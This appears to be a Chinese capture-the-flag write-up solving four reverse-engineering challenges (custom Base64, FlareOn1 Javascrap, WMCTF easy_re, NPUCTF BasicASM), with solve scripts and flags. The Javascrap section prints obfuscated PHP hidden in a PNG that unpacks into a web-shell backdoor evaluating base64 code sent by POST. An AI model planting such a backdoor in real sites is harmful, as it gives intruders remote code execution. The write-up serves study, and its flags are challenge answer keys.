REVERSE-PRACTICE-BUUCTF-25

- 特殊的 BASE64
- [FlareOn1]Javascrap
- [WMCTF2020]easy_re
- [NPUCTF2020]BasicASM

特殊的 BASE64

exe程序，运行后输入，无壳，ida分析
main函数，读取输入，进行变表base64编码，与rightFlag比较验证
base64-logic
在字符串窗口找到变表
base64-table
用工具解base64即可得到flag
base64-flag

[FlareOn1]Javascrap

html文件什么都得不到
用010 editor打开那个png文件，在文件最后隐写了php代码

<?php 
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
$do_me="";
for($i=0;$i<count($order);$i++)
{$do_me=$do_me.$terms[$order[$i]];}
eval($do_me); 
?>

把最后的eval改成echo，找个php在线工具执行一下，打印

$_=\'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

将第一个字符串$_解base64
js-debase64
将\97\49\x31开始的数据抠出来，转成字符串，做点简单变换即为flag

data=[97,49,0x31,68,0x4f,0x54,116,104,0x61,116,0x44,79,0x54,106,97,118,97,53,0x63,114,0x61,0x70,65,84,102,0x6c,0x61,114,101,0x44,65,0x53,72,111,0x6e,0x44,0x4f,84,99,0x6f,0x6d]
print(''.join(chr(i) for i in data))
# a11DOTthatDOTjava5crapATflareDASHonDOTcom
# a11.that.java5crap@flare-on.com

[WMCTF2020]easy_re

exe程序，perl语言写的，ida看不出什么东西
上x64dbg，F8单步调试，运行到这里时可以看到代码
（直接搜索字符串"script"，可以找到解压call，下断后F9，也可看到代码）
将输入与已定义的flag比较，直接交flag即可
easyre-code

$flag = \"WMCTF{{I_WAnt_dynam1c_F1ag}}\";
print \"please input the flag:\";
$line = <STDIN>;
chomp($line);
if($line eq $flag)
{{print \"congratulation!\"}}
else
{{print \"no,wrong\"}}

[NPUCTF2020]BasicASM

汇编代码，主要的逻辑为
读取输入，输入的下标为奇数时，输入的内容异或0x42，下标为偶数时不变
将变换后的输入转成十六进制输出

00007FF7A8AC5A92  lea         rcx,[flag]  
00007FF7A8AC5A96  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::basic_string<char,std::char_traits<char>,std::allocator<char> > (07FF7A8AC15E1h)  
00007FF7A8AC5A9B  nop  
00007FF7A8AC5A9C  mov         dword ptr [p],0				//[p]==0
00007FF7A8AC5AA3  mov         dword ptr [rbp+64h],0			//[rbp+64h]==0
00007FF7A8AC5AAA  jmp         main+64h (07FF7A8AC5AB4h)  
00007FF7A8AC5AAC  mov         eax,dword ptr [rbp+64h]  
00007FF7A8AC5AAF  inc         eax  
00007FF7A8AC5AB1  mov         dword ptr [rbp+64h],eax		//[rbp+64h]==1
00007FF7A8AC5AB4  movsxd      rax,dword ptr [rbp+64h]  
00007FF7A8AC5AB8  mov         qword ptr [rbp+1F8h],rax		//[rbp+1F8h]==1
00007FF7A8AC5ABF  lea         rcx,[flag]  
00007FF7A8AC5AC3  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::length (07FF7A8AC122Bh)  
00007FF7A8AC5AC8  mov         rcx,qword ptr [rbp+1F8h]		//rcx==1
00007FF7A8AC5ACF  cmp         rcx,rax						//rax==length(input)
00007FF7A8AC5AD2  jae         main+1B2h (07FF7A8AC5C02h)  
00007FF7A8AC5AD8  mov         eax,dword ptr [rbp+64h]		//eax==[rbp+64h]==1
00007FF7A8AC5ADB  and         eax,1							//eax&1 
00007FF7A8AC5ADE  cmp         eax,1							//判断是否为奇数
00007FF7A8AC5AE1  jne         main+126h (07FF7A8AC5B76h)  
00007FF7A8AC5AE7  movsxd      rax,dword ptr [rbp+64h]		//rax==[rbp+64h]==1
00007FF7A8AC5AEB  mov         rdx,rax  
00007FF7A8AC5AEE  lea         rcx,[flag]  
00007FF7A8AC5AF2  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::operator[] (07FF7A8AC1442h)  
00007FF7A8AC5AF7  movsx       eax,byte ptr [rax]			//eax==input[1]
00007FF7A8AC5AFA  xor         eax,42h						//eas^0x42
00007FF7A8AC5AFD  mov         dword ptr [p],eax				//[p]==eax
00007FF7A8AC5B00  mov         dl,30h  
00007FF7A8AC5B02  lea         rcx,[rbp+144h]  
00007FF7A8AC5B09  call        std::setfill<char> (07FF7A8AC1046h)  
00007FF7A8AC5B0E  mov         qword ptr [rbp+1F8h],rax  
00007FF7A8AC5B15  mov         edx,2  
00007FF7A8AC5B1A  lea         rcx,[rbp+168h]  
00007FF7A8AC5B21  call        std::setw (07FF7A8AC10D2h)  
00007FF7A8AC5B26  mov         qword ptr [rbp+200h],rax  
00007FF7A8AC5B2D  lea         rdx,[std::hex (07FF7A8AC1488h)]//十六进制  
00007FF7A8AC5B34  mov         rcx,qword ptr [__imp_std::cout (07FF7A8AD71C0h)]  
00007FF7A8AC5B3B  call        qword ptr [__imp_std::basic_ostream<char,std::char_traits<char> >::operator<< (07FF7A8AD7160h)] //输出

由输出的十六进制字串写脚本即可得到flag

res="662e61257b26301d7972751d6b2c6f355f3a38742d74341d61776d7d7d"
data=[]
for i in range(0,len(res),2):data.append(int('0x'+res[i:i+2],16))
for i in range(1,len(data),2):data[i]^=0x42
print(''.join(chr(i) for i in data))
#flag{d0_y0u_know_x86-64_a5m?}